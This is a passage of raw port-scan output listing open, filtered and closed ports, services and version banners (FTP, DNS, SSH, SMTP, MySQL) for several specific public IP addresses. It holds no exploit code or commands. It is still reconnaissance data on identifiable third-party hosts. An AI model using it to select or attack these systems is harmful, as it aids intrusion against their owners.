8028149.126.72.220 15084 tcp tcpwrapped open
8029149.126.72.220 15151 tcp tcpwrapped open
8030149.126.72.220 15555 tcp tcpwrapped open
8031149.126.72.220 16000 tcp tcpwrapped open
8032149.126.72.220 16001 tcp tcpwrapped open
8033149.126.72.220 16015 tcp tcpwrapped open
8034149.126.72.220 16016 tcp tcpwrapped open
8035149.126.72.220 16017 tcp tcpwrapped open
8036149.126.72.220 16082 tcp tcpwrapped open
8037149.126.72.220 16084 tcp tcpwrapped open
8038149.126.72.220 16311 tcp tcpwrapped open
8039149.126.72.220 16316 tcp tcpwrapped open
8040149.126.72.220 16443 tcp tcpwrapped open
8041149.126.72.220 16800 tcp tcpwrapped open
8042149.126.72.220 16888 tcp tcpwrapped open
8043149.126.72.220 17082 tcp tcpwrapped open
8044149.126.72.220 17084 tcp tcpwrapped open
8045149.126.72.220 17182 tcp tcpwrapped open
8046149.126.72.220 17184 tcp tcpwrapped open
8047149.126.72.220 17770 tcp tcpwrapped open
8048149.126.72.220 17771 tcp tcpwrapped open
8049149.126.72.220 17772 tcp tcpwrapped open
8050149.126.72.220 17773 tcp tcpwrapped open
8051149.126.72.220 17774 tcp tcpwrapped open
8052149.126.72.220 17775 tcp tcpwrapped open
8053149.126.72.220 17776 tcp tcpwrapped open
8054149.126.72.220 17777 tcp tcpwrapped open
8055149.126.72.220 17778 tcp tcpwrapped open
8056149.126.72.220 17779 tcp tcpwrapped open
8057149.126.72.220 17780 tcp tcpwrapped open
8058149.126.72.220 18000 tcp tcpwrapped open
8059149.126.72.220 18001 tcp tcpwrapped open
8060149.126.72.220 18002 tcp tcpwrapped open
8061149.126.72.220 18003 tcp tcpwrapped open
8062149.126.72.220 18004 tcp tcpwrapped open
8063149.126.72.220 18005 tcp tcpwrapped open
8064149.126.72.220 18006 tcp tcpwrapped open
8065149.126.72.220 18007 tcp tcpwrapped open
8066149.126.72.220 18008 tcp tcpwrapped open
8067149.126.72.220 18009 tcp tcpwrapped open
8068149.126.72.220 18010 tcp tcpwrapped open
8069149.126.72.220 18011 tcp tcpwrapped open
8070149.126.72.220 18012 tcp tcpwrapped open
8071149.126.72.220 18013 tcp tcpwrapped open
8072149.126.72.220 18014 tcp tcpwrapped open
8073149.126.72.220 18015 tcp tcpwrapped open
8074149.126.72.220 18016 tcp tcpwrapped open
8075149.126.72.220 18017 tcp tcpwrapped open
8076149.126.72.220 18018 tcp tcpwrapped open
8077149.126.72.220 18019 tcp tcpwrapped open
8078149.126.72.220 18020 tcp tcpwrapped open
8079149.126.72.220 18021 tcp tcpwrapped open
8080149.126.72.220 18022 tcp tcpwrapped open
8081149.126.72.220 18023 tcp tcpwrapped open
8082149.126.72.220 18024 tcp tcpwrapped open
8083149.126.72.220 18025 tcp tcpwrapped open
8084149.126.72.220 18026 tcp tcpwrapped open
8085149.126.72.220 18027 tcp tcpwrapped open
8086149.126.72.220 18028 tcp tcpwrapped open
8087149.126.72.220 18029 tcp tcpwrapped open
8088149.126.72.220 18030 tcp tcpwrapped open
8089149.126.72.220 18031 tcp tcpwrapped open
8090149.126.72.220 18032 tcp tcpwrapped open
8091149.126.72.220 18033 tcp tcpwrapped open
8092149.126.72.220 18034 tcp tcpwrapped open
8093149.126.72.220 18035 tcp tcpwrapped open
8094149.126.72.220 18036 tcp tcpwrapped open
8095149.126.72.220 18037 tcp tcpwrapped open
8096149.126.72.220 18038 tcp tcpwrapped open
8097149.126.72.220 18039 tcp tcpwrapped open
8098149.126.72.220 18040 tcp tcpwrapped open
8099149.126.72.220 18041 tcp tcpwrapped open
8100149.126.72.220 18042 tcp tcpwrapped open
8101149.126.72.220 18043 tcp tcpwrapped open
8102149.126.72.220 18044 tcp tcpwrapped open
8103149.126.72.220 18045 tcp tcpwrapped open
8104149.126.72.220 18046 tcp tcpwrapped open
8105149.126.72.220 18047 tcp tcpwrapped open
8106149.126.72.220 18048 tcp tcpwrapped open
8107149.126.72.220 18049 tcp tcpwrapped open
8108149.126.72.220 18050 tcp tcpwrapped open
8109149.126.72.220 18051 tcp tcpwrapped open
8110149.126.72.220 18052 tcp tcpwrapped open
8111149.126.72.220 18053 tcp tcpwrapped open
8112149.126.72.220 18054 tcp tcpwrapped open
8113149.126.72.220 18055 tcp tcpwrapped open
8114149.126.72.220 18056 tcp tcpwrapped open
8115149.126.72.220 18057 tcp tcpwrapped open
8116149.126.72.220 18058 tcp tcpwrapped open
8117149.126.72.220 18059 tcp tcpwrapped open
8118149.126.72.220 18060 tcp tcpwrapped open
8119149.126.72.220 18061 tcp tcpwrapped open
8120149.126.72.220 18062 tcp tcpwrapped open
8121149.126.72.220 18063 tcp tcpwrapped open
8122149.126.72.220 18064 tcp tcpwrapped open
8123149.126.72.220 18065 tcp tcpwrapped open
8124149.126.72.220 18066 tcp tcpwrapped open
8125149.126.72.220 18067 tcp tcpwrapped open
8126149.126.72.220 18068 tcp tcpwrapped open
8127149.126.72.220 18069 tcp tcpwrapped open
8128149.126.72.220 18070 tcp tcpwrapped open
8129149.126.72.220 18071 tcp tcpwrapped open
8130149.126.72.220 18072 tcp tcpwrapped open
8131149.126.72.220 18073 tcp tcpwrapped open
8132149.126.72.220 18074 tcp tcpwrapped open
8133149.126.72.220 18075 tcp tcpwrapped open
8134149.126.72.220 18076 tcp tcpwrapped open
8135149.126.72.220 18077 tcp tcpwrapped open
8136149.126.72.220 18078 tcp tcpwrapped open
8137149.126.72.220 18079 tcp tcpwrapped open
8138149.126.72.220 18080 tcp tcpwrapped open
8139149.126.72.220 18081 tcp tcpwrapped open
8140149.126.72.220 18082 tcp tcpwrapped open
8141149.126.72.220 18083 tcp tcpwrapped open
8142149.126.72.220 18084 tcp tcpwrapped open
8143149.126.72.220 18085 tcp tcpwrapped open
8144149.126.72.220 18086 tcp tcpwrapped open
8145149.126.72.220 18087 tcp tcpwrapped open
8146149.126.72.220 18088 tcp tcpwrapped open
8147149.126.72.220 18089 tcp tcpwrapped open
8148149.126.72.220 18090 tcp tcpwrapped open
8149149.126.72.220 18091 tcp tcpwrapped open
8150149.126.72.220 18092 tcp tcpwrapped open
8151149.126.72.220 18093 tcp tcpwrapped open
8152149.126.72.220 18094 tcp tcpwrapped open
8153149.126.72.220 18095 tcp tcpwrapped open
8154149.126.72.220 18096 tcp tcpwrapped open
8155149.126.72.220 18097 tcp tcpwrapped open
8156149.126.72.220 18098 tcp tcpwrapped open
8157149.126.72.220 18099 tcp tcpwrapped open
8158149.126.72.220 18100 tcp tcpwrapped open
8159149.126.72.220 18101 tcp tcpwrapped open
8160149.126.72.220 18102 tcp tcpwrapped open
8161149.126.72.220 18103 tcp tcpwrapped open
8162149.126.72.220 18104 tcp tcpwrapped open
8163149.126.72.220 18105 tcp tcpwrapped open
8164149.126.72.220 18106 tcp tcpwrapped open
8165149.126.72.220 18107 tcp tcpwrapped open
8166149.126.72.220 18108 tcp tcpwrapped open
8167149.126.72.220 18109 tcp tcpwrapped open
8168149.126.72.220 18110 tcp tcpwrapped open
8169149.126.72.220 18111 tcp tcpwrapped open
8170149.126.72.220 18112 tcp tcpwrapped open
8171149.126.72.220 18113 tcp tcpwrapped open
8172149.126.72.220 18200 tcp tcpwrapped open
8173149.126.72.220 18239 tcp tcpwrapped open
8174149.126.72.220 18443 tcp tcpwrapped open
8175149.126.72.220 18802 tcp tcpwrapped open
8176149.126.72.220 19013 tcp tcpwrapped open
8177149.126.72.220 19014 tcp tcpwrapped open
8178149.126.72.220 19015 tcp tcpwrapped open
8179149.126.72.220 19016 tcp tcpwrapped open
8180149.126.72.220 19017 tcp tcpwrapped open
8181149.126.72.220 19022 tcp tcpwrapped open
8182149.126.72.220 19080 tcp tcpwrapped open
8183149.126.72.220 19082 tcp tcpwrapped open
8184149.126.72.220 19084 tcp tcpwrapped open
8185149.126.72.220 19443 tcp tcpwrapped open
8186149.126.72.220 20000 tcp tcpwrapped open
8187149.126.72.220 20001 tcp tcpwrapped open
8188149.126.72.220 20010 tcp tcpwrapped open
8189149.126.72.220 20020 tcp tcpwrapped open
8190149.126.72.220 20030 tcp tcpwrapped open
8191149.126.72.220 20040 tcp tcpwrapped open
8192149.126.72.220 20050 tcp tcpwrapped open
8193149.126.72.220 20053 tcp tcpwrapped open
8194149.126.72.220 20060 tcp tcpwrapped open
8195149.126.72.220 20070 tcp tcpwrapped open
8196149.126.72.220 20080 tcp tcpwrapped open
8197149.126.72.220 20082 tcp tcpwrapped open
8198149.126.72.220 20084 tcp tcpwrapped open
8199149.126.72.220 20090 tcp tcpwrapped open
8200149.126.72.220 20100 tcp tcpwrapped open
8201149.126.72.220 20106 tcp tcpwrapped open
8202149.126.72.220 20107 tcp tcpwrapped open
8203149.126.72.220 20110 tcp tcpwrapped open
8204149.126.72.220 20150 tcp tcpwrapped open
8205149.126.72.220 20182 tcp tcpwrapped open
8206149.126.72.220 20184 tcp tcpwrapped open
8207149.126.72.220 20185 tcp tcpwrapped open
8208149.126.72.220 20200 tcp tcpwrapped open
8209149.126.72.220 20208 tcp tcpwrapped open
8210149.126.72.220 20325 tcp tcpwrapped open
8211149.126.72.220 20500 tcp tcpwrapped open
8212149.126.72.220 20512 tcp tcpwrapped open
8213149.126.72.220 20600 tcp tcpwrapped open
8214149.126.72.220 20800 tcp tcpwrapped open
8215149.126.72.220 20892 tcp tcpwrapped open
8216149.126.72.220 20894 tcp tcpwrapped open
8217149.126.72.220 20900 tcp tcpwrapped open
8218149.126.72.220 21081 tcp tcpwrapped open
8219149.126.72.220 21082 tcp tcpwrapped open
8220149.126.72.220 21083 tcp tcpwrapped open
8221149.126.72.220 21084 tcp tcpwrapped open
8222149.126.72.220 21100 tcp tcpwrapped open
8223149.126.72.220 21200 tcp tcpwrapped open
8224149.126.72.220 21300 tcp tcpwrapped open
8225149.126.72.220 21357 tcp tcpwrapped open
8226149.126.72.220 21381 tcp tcpwrapped open
8227149.126.72.220 21400 tcp tcpwrapped open
8228149.126.72.220 21500 tcp tcpwrapped open
8229149.126.72.220 21935 tcp tcpwrapped open
8230149.126.72.220 22082 tcp tcpwrapped open
8231149.126.72.220 22084 tcp tcpwrapped open
8232149.126.72.220 22103 tcp tcpwrapped open
8233149.126.72.220 22107 tcp tcpwrapped open
8234149.126.72.220 22206 tcp tcpwrapped open
8235149.126.72.220 22345 tcp tcpwrapped open
8236149.126.72.220 22403 tcp tcpwrapped open
8237149.126.72.220 22609 tcp tcpwrapped open
8238149.126.72.220 22703 tcp tcpwrapped open
8239149.126.72.220 22705 tcp tcpwrapped open
8240149.126.72.220 23082 tcp tcpwrapped open
8241149.126.72.220 23084 tcp tcpwrapped open
8242149.126.72.220 23182 tcp tcpwrapped open
8243149.126.72.220 23184 tcp tcpwrapped open
8244149.126.72.220 24082 tcp tcpwrapped open
8245149.126.72.220 24084 tcp tcpwrapped open
8246149.126.72.220 24472 tcp tcpwrapped open
8247149.126.72.220 24510 tcp tcpwrapped open
8248149.126.72.220 25000 tcp tcpwrapped open
8249149.126.72.220 25001 tcp tcpwrapped open
8250149.126.72.220 25002 tcp tcpwrapped open
8251149.126.72.220 25003 tcp tcpwrapped open
8252149.126.72.220 25004 tcp tcpwrapped open
8253149.126.72.220 25005 tcp tcpwrapped open
8254149.126.72.220 25006 tcp tcpwrapped open
8255149.126.72.220 25007 tcp tcpwrapped open
8256149.126.72.220 25008 tcp tcpwrapped open
8257149.126.72.220 25009 tcp tcpwrapped open
8258149.126.72.220 25010 tcp tcpwrapped open
8259149.126.72.220 25082 tcp tcpwrapped open
8260149.126.72.220 25084 tcp tcpwrapped open
8261149.126.72.220 25782 tcp tcpwrapped open
8262149.126.72.220 25952 tcp tcpwrapped open
8263149.126.72.220 27571 tcp tcpwrapped open
8264149.126.72.220 28001 tcp tcpwrapped open
8265149.126.72.220 28080 tcp tcpwrapped open
8266149.126.72.220 28818 tcp tcpwrapped open
8267149.126.72.220 29798 tcp tcpwrapped open
8268149.126.72.220 29799 tcp tcpwrapped open
8269149.126.72.220 30000 tcp tcpwrapped open
8270149.126.72.220 30001 tcp tcpwrapped open
8271149.126.72.220 30003 tcp tcpwrapped open
8272149.126.72.220 30005 tcp tcpwrapped open
8273149.126.72.220 30007 tcp tcpwrapped open
8274149.126.72.220 30009 tcp tcpwrapped open
8275149.126.72.220 30011 tcp tcpwrapped open
8276149.126.72.220 30013 tcp tcpwrapped open
8277149.126.72.220 30015 tcp tcpwrapped open
8278149.126.72.220 30017 tcp tcpwrapped open
8279149.126.72.220 30019 tcp tcpwrapped open
8280149.126.72.220 30021 tcp tcpwrapped open
8281149.126.72.220 30050 tcp tcpwrapped open
8282149.126.72.220 30106 tcp tcpwrapped open
8283149.126.72.220 30110 tcp tcpwrapped open
8284149.126.72.220 30111 tcp tcpwrapped open
8285149.126.72.220 30112 tcp tcpwrapped open
8286149.126.72.220 30113 tcp tcpwrapped open
8287149.126.72.220 30120 tcp tcpwrapped open
8288149.126.72.220 30121 tcp tcpwrapped open
8289149.126.72.220 30122 tcp tcpwrapped open
8290149.126.72.220 30123 tcp tcpwrapped open
8291149.126.72.220 30452 tcp tcpwrapped open
8292149.126.72.220 30468 tcp tcpwrapped open
8293149.126.72.220 30473 tcp tcpwrapped open
8294149.126.72.220 30479 tcp tcpwrapped open
8295149.126.72.220 30501 tcp tcpwrapped open
8296149.126.72.220 30700 tcp tcpwrapped open
8297149.126.72.220 30701 tcp tcpwrapped open
8298149.126.72.220 30892 tcp tcpwrapped open
8299149.126.72.220 30894 tcp tcpwrapped open
8300149.126.72.220 31337 tcp tcpwrapped open
8301149.126.72.220 32101 tcp tcpwrapped open
8302149.126.72.220 32102 tcp tcpwrapped open
8303149.126.72.220 32202 tcp tcpwrapped open
8304149.126.72.220 32303 tcp tcpwrapped open
8305149.126.72.220 32443 tcp tcpwrapped open
8306149.126.72.220 32444 tcp tcpwrapped open
8307149.126.72.220 32746 tcp tcpwrapped open
8308149.126.72.220 32800 tcp tcpwrapped open
8309149.126.72.220 34225 tcp tcpwrapped open
8310149.126.72.220 34500 tcp tcpwrapped open
8311149.126.72.220 35522 tcp tcpwrapped open
8312149.126.72.220 35524 tcp tcpwrapped open
8313149.126.72.220 35531 tcp tcpwrapped open
8314149.126.72.220 35554 tcp tcpwrapped open
8315149.126.72.220 35559 tcp tcpwrapped open
8316149.126.72.220 35560 tcp tcpwrapped open
8317149.126.72.220 36982 tcp tcpwrapped open
8318149.126.72.220 36983 tcp tcpwrapped open
8319149.126.72.220 36984 tcp tcpwrapped open
8320149.126.72.220 37080 tcp tcpwrapped open
8321149.126.72.220 38880 tcp tcpwrapped open
8322149.126.72.220 39001 tcp tcpwrapped open
8323149.126.72.220 40070 tcp tcpwrapped open
8324149.126.72.220 40099 tcp tcpwrapped open
8325149.126.72.220 40892 tcp tcpwrapped open
8326149.126.72.220 40894 tcp tcpwrapped open
8327149.126.72.220 42208 tcp tcpwrapped open
8328149.126.72.220 42424 tcp tcpwrapped open
8329149.126.72.220 42901 tcp tcpwrapped open
8330149.126.72.220 43008 tcp tcpwrapped open
8331149.126.72.220 43009 tcp tcpwrapped open
8332149.126.72.220 43200 tcp tcpwrapped open
8333149.126.72.220 44100 tcp tcpwrapped open
8334149.126.72.220 44300 tcp tcpwrapped open
8335149.126.72.220 44301 tcp tcpwrapped open
8336149.126.72.220 44302 tcp tcpwrapped open
8337149.126.72.220 44303 tcp tcpwrapped open
8338149.126.72.220 44304 tcp tcpwrapped open
8339149.126.72.220 44305 tcp tcpwrapped open
8340149.126.72.220 44306 tcp tcpwrapped open
8341149.126.72.220 44307 tcp tcpwrapped open
8342149.126.72.220 44308 tcp tcpwrapped open
8343149.126.72.220 44309 tcp tcpwrapped open
8344149.126.72.220 44310 tcp tcpwrapped open
8345149.126.72.220 44320 tcp tcpwrapped open
8346149.126.72.220 44332 tcp tcpwrapped open
8347149.126.72.220 44333 tcp tcpwrapped open
8348149.126.72.220 44334 tcp tcpwrapped open
8349149.126.72.220 44336 tcp tcpwrapped open
8350149.126.72.220 44337 tcp tcpwrapped open
8351149.126.72.220 44340 tcp tcpwrapped open
8352149.126.72.220 44341 tcp tcpwrapped open
8353149.126.72.220 44345 tcp tcpwrapped open
8354149.126.72.220 44400 tcp tcpwrapped open
8355149.126.72.220 44410 tcp tcpwrapped open
8356149.126.72.220 44420 tcp tcpwrapped open
8357149.126.72.220 45000 tcp tcpwrapped open
8358149.126.72.220 45555 tcp tcpwrapped open
8359149.126.72.220 45666 tcp tcpwrapped open
8360149.126.72.220 45667 tcp tcpwrapped open
8361149.126.72.220 45668 tcp tcpwrapped open
8362149.126.72.220 45677 tcp tcpwrapped open
8363149.126.72.220 45777 tcp tcpwrapped open
8364149.126.72.220 45788 tcp tcpwrapped open
8365149.126.72.220 45821 tcp tcpwrapped open
8366149.126.72.220 45886 tcp tcpwrapped open
8367149.126.72.220 45888 tcp tcpwrapped open
8368149.126.72.220 46000 tcp tcpwrapped open
8369149.126.72.220 46443 tcp tcpwrapped open
8370149.126.72.220 46862 tcp tcpwrapped open
8371149.126.72.220 47000 tcp tcpwrapped open
8372149.126.72.220 47080 tcp tcpwrapped open
8373149.126.72.220 47534 tcp tcpwrapped open
8374149.126.72.220 48888 tcp tcpwrapped open
8375149.126.72.220 48889 tcp tcpwrapped open
8376149.126.72.220 49200 tcp tcpwrapped open
8377149.126.72.220 49210 tcp tcpwrapped open
8378149.126.72.220 49443 tcp tcpwrapped open
8379149.126.72.220 49682 tcp tcpwrapped open
8380149.126.72.220 49684 tcp tcpwrapped open
8381149.126.72.220 49686 tcp tcpwrapped open
8382149.126.72.220 49688 tcp tcpwrapped open
8383149.126.72.220 49690 tcp tcpwrapped open
8384149.126.72.220 49692 tcp tcpwrapped open
8385149.126.72.220 49694 tcp tcpwrapped open
8386149.126.72.220 50000 tcp tcpwrapped open
8387149.126.72.220 50001 tcp tcpwrapped open
8388149.126.72.220 50042 tcp tcpwrapped open
8389149.126.72.220 50050 tcp tcpwrapped open
8390149.126.72.220 50073 tcp tcpwrapped open
8391149.126.72.220 50085 tcp tcpwrapped open
8392149.126.72.220 50101 tcp tcpwrapped open
8393149.126.72.220 50102 tcp tcpwrapped open
8394149.126.72.220 50103 tcp tcpwrapped open
8395149.126.72.220 50104 tcp tcpwrapped open
8396149.126.72.220 50105 tcp tcpwrapped open
8397149.126.72.220 50106 tcp tcpwrapped open
8398149.126.72.220 50107 tcp tcpwrapped open
8399149.126.72.220 50112 tcp tcpwrapped open
8400149.126.72.220 50113 tcp tcpwrapped open
8401149.126.72.220 50122 tcp tcpwrapped open
8402149.126.72.220 50160 tcp tcpwrapped open
8403149.126.72.220 50443 tcp tcpwrapped open
8404149.126.72.220 51002 tcp tcpwrapped open
8405149.126.72.220 51003 tcp tcpwrapped open
8406149.126.72.220 51434 tcp tcpwrapped open
8407149.126.72.220 52010 tcp tcpwrapped open
8408149.126.72.220 52230 tcp tcpwrapped open
8409149.126.72.220 52311 tcp tcpwrapped open
8410149.126.72.220 52536 tcp tcpwrapped open
8411149.126.72.220 53480 tcp tcpwrapped open
8412149.126.72.220 53481 tcp tcpwrapped open
8413149.126.72.220 53482 tcp tcpwrapped open
8414149.126.72.220 53483 tcp tcpwrapped open
8415149.126.72.220 53484 tcp tcpwrapped open
8416149.126.72.220 53485 tcp tcpwrapped open
8417149.126.72.220 53490 tcp tcpwrapped open
8418149.126.72.220 53805 tcp tcpwrapped open
8419149.126.72.220 53806 tcp tcpwrapped open
8420149.126.72.220 54327 tcp tcpwrapped open
8421149.126.72.220 54490 tcp tcpwrapped open
8422149.126.72.220 54545 tcp tcpwrapped open
8423149.126.72.220 55055 tcp tcpwrapped open
8424149.126.72.220 55080 tcp tcpwrapped open
8425149.126.72.220 55081 tcp tcpwrapped open
8426149.126.72.220 55350 tcp tcpwrapped open
8427149.126.72.220 55388 tcp tcpwrapped open
8428149.126.72.220 55470 tcp tcpwrapped open
8429149.126.72.220 55475 tcp tcpwrapped open
8430149.126.72.220 55481 tcp tcpwrapped open
8431149.126.72.220 55490 tcp tcpwrapped open
8432149.126.72.220 57778 tcp tcpwrapped open
8433149.126.72.220 57779 tcp tcpwrapped open
8434149.126.72.220 57780 tcp tcpwrapped open
8435149.126.72.220 57781 tcp tcpwrapped open
8436149.126.72.220 57782 tcp tcpwrapped open
8437149.126.72.220 57783 tcp tcpwrapped open
8438149.126.72.220 57784 tcp tcpwrapped open
8439149.126.72.220 57785 tcp tcpwrapped open
8440149.126.72.220 57786 tcp tcpwrapped open
8441149.126.72.220 57787 tcp tcpwrapped open
8442149.126.72.220 57788 tcp tcpwrapped open
8443149.126.72.220 58443 tcp tcpwrapped open
8444149.126.72.220 58585 tcp tcpwrapped open
8445149.126.72.220 59012 tcp tcpwrapped open
8446149.126.72.220 59443 tcp tcpwrapped open
8447149.126.72.220 60021 tcp tcpwrapped open
8448149.126.72.220 60023 tcp tcpwrapped open
8449149.126.72.220 60443 tcp tcpwrapped open
8450149.126.72.220 62080 tcp tcpwrapped open
8451149.126.72.220 62237 tcp tcpwrapped open
8452149.126.72.220 62443 tcp tcpwrapped open
8453149.126.72.220 62865 tcp tcpwrapped open
8454149.126.72.220 63443 tcp tcpwrapped open
8455149.126.72.220 64477 tcp tcpwrapped open
8456149.126.72.220 64671 tcp tcpwrapped open
8457151.106.38.107 21 tcp ftp open 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\x0d\x0a220-You are user number 1 of 50 allowed.\x0d\x0a220-Local time is now 12:11. Server port: 21.\x0d\x0a220-This is a private system - No anonymous login\x0d\x0a220-IPv6 connections are also welcome on this server.\x0d\x0a220 You will be disconnected after 15 minutes of inactivity.\x0d\x0a
8458151.106.38.107 53 tcp domain open ISC BIND 9.11.4-P2 RedHat Enterprise Linux 7
8459151.106.38.107 53 udp domain open ISC BIND 9.11.4-P2 RedHat Enterprise Linux 7
8460151.106.38.107 67 tcp dhcps filtered
8461151.106.38.107 67 udp dhcps unknown
8462151.106.38.107 68 tcp dhcpc filtered
8463151.106.38.107 68 udp dhcpc unknown
8464151.106.38.107 69 tcp tftp filtered
8465151.106.38.107 69 udp tftp unknown
8466151.106.38.107 88 tcp kerberos-sec filtered
8467151.106.38.107 88 udp kerberos-sec unknown
8468151.106.38.107 123 tcp ntp filtered
8469151.106.38.107 123 udp ntp unknown
8470151.106.38.107 137 tcp netbios-ns filtered
8471151.106.38.107 137 udp netbios-ns unknown
8472151.106.38.107 138 tcp netbios-dgm filtered
8473151.106.38.107 138 udp netbios-dgm unknown
8474151.106.38.107 139 tcp netbios-ssn filtered
8475151.106.38.107 139 udp netbios-ssn unknown
8476151.106.38.107 161 tcp snmp filtered
8477151.106.38.107 161 udp snmp unknown
8478151.106.38.107 162 tcp snmptrap filtered
8479151.106.38.107 162 udp snmptrap unknown
8480151.106.38.107 389 tcp ldap filtered
8481151.106.38.107 389 udp ldap unknown
8482151.106.38.107 520 tcp efs filtered
8483151.106.38.107 520 udp route unknown
8484151.106.38.107 2049 tcp nfs filtered
8485151.106.38.107 2049 udp nfs unknown
8486158.69.13.254 22 tcp ssh open OpenSSH 7.4 protocol 2.0
8487158.69.13.254 25 tcp smtp open Exim smtpd 4.92.3
8488158.69.13.254 53 tcp domain open unknown banner: get lost
8489158.69.13.254 53 udp domain open unknown banner: get lost
8490158.69.13.254 67 tcp dhcps filtered
8491158.69.13.254 67 udp dhcps unknown
8492158.69.13.254 68 tcp dhcpc filtered
8493158.69.13.254 68 udp dhcpc unknown
8494158.69.13.254 69 tcp tftp filtered
8495158.69.13.254 69 udp tftp unknown
8496158.69.13.254 80 tcp http open nginx
8497158.69.13.254 88 tcp kerberos-sec filtered
8498158.69.13.254 88 udp kerberos-sec unknown
8499158.69.13.254 123 tcp ntp filtered
8500158.69.13.254 123 udp ntp unknown
8501158.69.13.254 137 tcp netbios-ns filtered
8502158.69.13.254 137 udp netbios-ns unknown
8503158.69.13.254 138 tcp netbios-dgm filtered
8504158.69.13.254 138 udp netbios-dgm unknown
8505158.69.13.254 139 tcp netbios-ssn filtered
8506158.69.13.254 139 udp netbios-ssn unknown
8507158.69.13.254 161 tcp snmp filtered
8508158.69.13.254 161 udp snmp unknown
8509158.69.13.254 162 tcp snmptrap filtered
8510158.69.13.254 162 udp snmptrap unknown
8511158.69.13.254 389 tcp ldap filtered
8512158.69.13.254 389 udp ldap unknown
8513158.69.13.254 443 tcp ssl/http open nginx
8514158.69.13.254 465 tcp ssl/smtp open Exim smtpd 4.92.3
8515158.69.13.254 520 tcp efs filtered
8516158.69.13.254 520 udp route unknown
8517158.69.13.254 587 tcp smtp open Exim smtpd 4.92.3
8518158.69.13.254 2049 tcp nfs filtered
8519158.69.13.254 2049 udp nfs unknown
8520158.69.13.254 2525 tcp smtp open Exim smtpd 4.92.3
8521158.69.13.254 3306 tcp mysql open MySQL blocked - too many connection errors
8522162.244.35.13 22 tcp ssh open SSH-2.0-OpenSSH_7.2 FreeBSD-20160310
8523162.244.35.13 25 tcp open
8524162.244.35.13 53 tcp domain open ISC BIND 9.10.6
8525162.244.35.13 53 udp domain open ISC BIND 9.10.6
8526162.244.35.13 67 tcp dhcps closed
8527162.244.35.13 67 udp dhcps closed
8528162.244.35.13 68 tcp dhcpc closed
8529162.244.35.13 68 udp dhcpc closed
8530162.244.35.13 69 tcp tftp closed
8531162.244.35.13 69 udp tftp closed
8532162.244.35.13 88 tcp kerberos-sec closed
8533162.244.35.13 88 udp kerberos-sec closed
8534162.244.35.13 123 tcp ntp closed
8535162.244.35.13 123 udp ntp closed
8536162.244.35.13 137 tcp netbios-ns filtered
8537162.244.35.13 137 udp netbios-ns unknown
8538162.244.35.13 138 tcp netbios-dgm filtered
8539162.244.35.13 138 udp netbios-dgm unknown
8540162.244.35.13 139 tcp netbios-ssn filtered
8541162.244.35.13 139 udp netbios-ssn unknown
8542162.244.35.13 161 tcp snmp closed
8543162.244.35.13 161 udp snmp closed
8544162.244.35.13 162 tcp snmptrap closed
8545162.244.35.13 162 udp snmptrap closed
8546162.244.35.13 389 tcp ldap closed
8547162.244.35.13 389 udp ldap closed
8548162.244.35.13 520 tcp efs closed
8549162.244.35.13 520 udp route closed
8550162.244.35.13 2049 tcp nfs closed
8551162.244.35.13 2049 udp nfs closed
8552169.239.218.20 25 tcp smtp closed
8553169.239.218.20 53 tcp domain filtered
8554169.239.218.20 53 udp domain unknown
8555169.239.218.20 67 tcp dhcps filtered
8556169.239.218.20 67 udp dhcps unknown
8557169.239.218.20 68 tcp dhcpc filtered
8558169.239.218.20 68 udp dhcpc unknown
8559169.239.218.20 69 tcp tftp filtered
8560169.239.218.20 69 udp tftp unknown
8561169.239.218.20 88 tcp kerberos-sec filtered
8562169.239.218.20 88 udp kerberos-sec unknown
8563169.239.218.20 113 tcp ident closed
8564169.239.218.20 123 tcp ntp filtered
8565169.239.218.20 123 udp ntp unknown
8566169.239.218.20 137 tcp netbios-ns filtered
8567169.239.218.20 137 udp netbios-ns filtered
8568169.239.218.20 138 tcp netbios-dgm filtered
8569169.239.218.20 138 udp netbios-dgm filtered
8570169.239.218.20 139 tcp netbios-ssn closed
8571169.239.218.20 139 udp netbios-ssn unknown
8572169.239.218.20 161 tcp snmp filtered
8573169.239.218.20 161 udp snmp unknown
8574169.239.218.20 162 tcp snmptrap filtered
8575169.239.218.20 162 udp snmptrap unknown
8576169.239.218.20 389 tcp ldap filtered
8577169.239.218.20 389 udp ldap unknown
8578169.239.218.20 445 tcp microsoft-ds closed
8579169.239.218.20 520 tcp efs filtered
8580169.239.218.20 520 udp route unknown
8581169.239.218.20 2049 tcp nfs filtered
8582169.239.218.20 2049 udp nfs unknown
8583169.239.218.20 8008 tcp tcpwrapped open
8584173.214.244.169 53 tcp domain filtered
8585173.214.244.169 53 udp domain unknown
8586173.214.244.169 67 tcp dhcps filtered
8587173.214.244.169 67 udp dhcps unknown
8588173.214.244.169 68 tcp dhcpc filtered
8589173.214.244.169 68 udp dhcpc unknown
8590173.214.244.169 69 tcp tftp filtered
8591173.214.244.169 69 udp tftp unknown
8592173.214.244.169 88 tcp kerberos-sec filtered
8593173.214.244.169 88 udp kerberos-sec unknown
8594173.214.244.169 123 tcp ntp filtered
8595173.214.244.169 123 udp ntp unknown
8596173.214.244.169 137 tcp netbios-ns filtered
8597173.214.244.169 137 udp netbios-ns unknown
8598173.214.244.169 138 tcp netbios-dgm filtered
8599173.214.244.169 138 udp netbios-dgm unknown
8600173.214.244.169 139 tcp netbios-ssn filtered
8601173.214.244.169 139 udp netbios-ssn unknown
8602173.214.244.169 161 tcp snmp filtered
8603173.214.244.169 161 udp snmp unknown
8604173.214.244.169 162 tcp snmptrap filtered
8605173.214.244.169 162 udp snmptrap unknown
8606173.214.244.169 389 tcp ldap filtered
8607173.214.244.169 389 udp ldap unknown
8608173.214.244.169 520 tcp efs filtered
8609173.214.244.169 520 udp route unknown
8610173.214.244.169 2049 tcp nfs filtered
8611173.214.244.169 2049 udp nfs unknown
8612174.142.53.51 21 tcp ftp open 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\x0d\x0a220-You are user number 1 of 50 allowed.\x0d\x0a220-Local time is now 13:59. Server port: 21.\x0d\x0a220-This is a private system - No anonymous login\x0d\x0a220-IPv6 connections are also welcome on this server.\x0d\x0a220 You will be disconnected after 15 minutes of inactivity.\x0d\x0a
8613174.142.53.51 22 tcp ssh open SSH-2.0-OpenSSH_7.4
8614174.142.53.51 25 tcp smtp closed
8615174.142.53.51 53 tcp domain open ISC BIND 9.11.4-P2 RedHat Enterprise Linux 7
8616174.142.53.51 53 udp domain open ISC BIND 9.11.4-P2 RedHat Enterprise Linux 7
8617174.142.53.51 67 tcp dhcps filtered
8618174.142.53.51 67 udp dhcps unknown
